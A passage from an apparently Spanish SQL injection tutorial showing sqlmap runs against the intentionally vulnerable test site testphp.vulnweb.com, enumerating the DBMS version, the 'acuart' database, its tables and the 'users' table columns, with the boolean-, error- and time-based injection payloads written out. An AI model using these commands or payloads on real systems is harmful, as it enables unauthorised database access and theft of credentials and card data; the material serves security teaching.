Vamos a sqlmap y probamos con: A) Servidor de BD y Versión C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 10:52:48 [10:52:49] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com\session ' as session file [10:52:49] [INFO] testing connection to the target url [10:52:49] [INFO] testing if the url is stable, wait a few seconds [10:52:50] [INFO] url is stable [10:52:50] [INFO] testing if GET parameter 'cat' is dynamic [10:52:50] [INFO] confirming that GET parameter 'cat' is dynamic [10:52:51] [INFO] GET parameter 'cat' is dynamic [10:52:51] [INFO] heuristic test shows that GET parameter 'cat' might be injecta

ble (possible DBMS: MySQL) [10:52:51] [INFO] testing sql injection on GET parameter 'cat' [10:52:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [10:52:52] [INFO] GET parameter 'cat' is 'AND boolean-based blind - WHERE or HAV ING clause' injectable [10:52:52] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [10:52:52] [INFO] GET parameter 'cat' is 'MySQL >= 5.0 AND error-based - WHERE o r HAVING clause' injectable [10:52:52] [INFO] testing 'MySQL > 5.0.11 stacked queries' [10:52:52] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [10:53:52] [INFO] GET parameter 'cat' is 'MySQL > 5.0.11 AND time-based blind' i njectable [10:53:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [10:53:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'

GET parameter 'cat' is vulnerable. Do you want to keep testing the others? [y/N] n sqlmap identified the following injection points with a total of 29 HTTP(s) requ ests: --Place: GET Parameter: cat Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat=1 AND 4423=4423 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: cat=1 AND (SELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,10 7,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),F LOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: cat=1 AND SLEEP(5) --[10:54:07] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake )

web application technology: Apache 2.0.55, PHP 5.1.2 back-end DBMS: MySQL 5.0 [10:54:07] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\ output\testphp.vulnweb.com' [*] shutting down at: 10:54:07

El parámetro cat es vulnerable

Iván Martín Valderas

Página 24

SQL Injection

B) Nombre de la BD C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?ca t=1 --current-db sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 11:52:15 [11:52:15] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com\session ' as session file [11:52:15] [INFO] resuming injection data from session file [11:52:15] [INFO] resuming back-end DBMS 'mysql 5.0' from session file [11:52:15] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: cat Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat=1 AND 4423=4423 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: cat=1 AND (SELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,10 7,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),F LOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: cat=1 AND SLEEP(5) --[11:52:16] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake ) web application technology: Apache 2.0.55, PHP 5.1.2 back-end DBMS: MySQL 5.0 [11:52:16] [INFO] fetching current database

[11:52:18] [INFO] retrieved: acuart current database: 'acuart' [11:52:18] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\ output\testphp.vulnweb.com' [*] shutting down at: 11:52:18

C) Tablas C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?ca t=1 --tables -D acuart sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 11:54:12 [11:54:12] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com\session ' as session file [11:54:12] [INFO] resuming injection data from session file [11:54:12] [INFO] resuming back-end DBMS 'mysql 5.0' from session file [11:54:12] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: cat Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat=1 AND 4423=4423 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: cat=1 AND (SELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,10 7,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),F LOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: cat=1 AND SLEEP(5) --[11:54:14] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake ) web application technology: Apache 2.0.55, PHP 5.1.2 back-end DBMS: MySQL 5.0 [11:54:14] [INFO] fetching tables for database 'acuart' [11:54:14] [INFO] the SQL query used returns 7 entries [11:54:15] [INFO] retrieved: acuart [11:54:15] [INFO] retrieved: artists [11:54:15] [INFO] retrieved: acuart [11:54:15] [INFO] retrieved: carts [11:54:16] [INFO] retrieved: acuart [11:54:16] [INFO] retrieved: categ [11:54:16] [INFO] retrieved: acuart [11:54:16] [INFO] retrieved: featured [11:54:17] [INFO] retrieved: acuart [11:54:17] [INFO] retrieved: guestbook [11:54:17] [INFO] retrieved: acuart [11:54:17] [INFO] retrieved: pictures [11:54:18] [INFO] retrieved: acuart [11:54:18] [INFO] retrieved: users

Database: acuart [7 tables] +-----------+ | artists | | carts | | categ | | featured | | guestbook | | pictures | | users | +-----------+

Iván Martín Valderas

Página 26

SQL Injection

D) Columnas C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?ca t=1 --columns -T users -D acuart sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 11:56:55 [11:56:55] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\testphp.vulnweb.com\session ' as session file [11:56:55] [INFO] resuming injection data from session file [11:56:55] [INFO] resuming back-end DBMS 'mysql 5.0' from session file [11:56:55] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --Place: GET Parameter: cat Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat=1 AND 4423=4423 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: cat=1 AND (SELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,10 7,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),F LOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: cat=1 AND SLEEP(5) --[11:56:56] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake ) web application technology: Apache 2.0.55, PHP 5.1.2 back-end DBMS: MySQL 5.0 [11:56:56] [INFO] fetching columns for table 'users' on database 'acuart' [11:56:56] [INFO] the SQL query used returns 8 entries [11:56:56] [INFO] retrieved: uname [11:56:56] [INFO] retrieved: varchar(100) [11:56:57] [INFO] retrieved: pass [11:56:57] [INFO] retrieved: varchar(100) [11:56:57] [INFO] retrieved: cc Database: acuart [11:56:58] [INFO] retrieved: varchar(100) [11:56:58] [INFO] retrieved: address Table: users [11:56:58] [INFO] retrieved: mediumtext [8 columns] [11:56:58] [INFO] retrieved: email +---------+--------------+ [11:56:58] [INFO] retrieved: varchar(100) | Column | Type | [11:56:58] [INFO] retrieved: name [11:56:59] [INFO] retrieved: varchar(100) +---------+--------------+ [11:56:59] [INFO] retrieved: phone | address | mediumtext [11:56:59] [INFO] retrieved: varchar(100) | cart | varchar(100) | [11:56:59] [INFO] retrieved: cart | cc | varchar(100) | [11:56:59] [INFO] retrieved: varchar(100)

|

| email | varchar(100) | | name | varchar(100) | | pass | varchar(100) | | phone | varchar(100) | | uname | varchar(100) | +---------+--------------+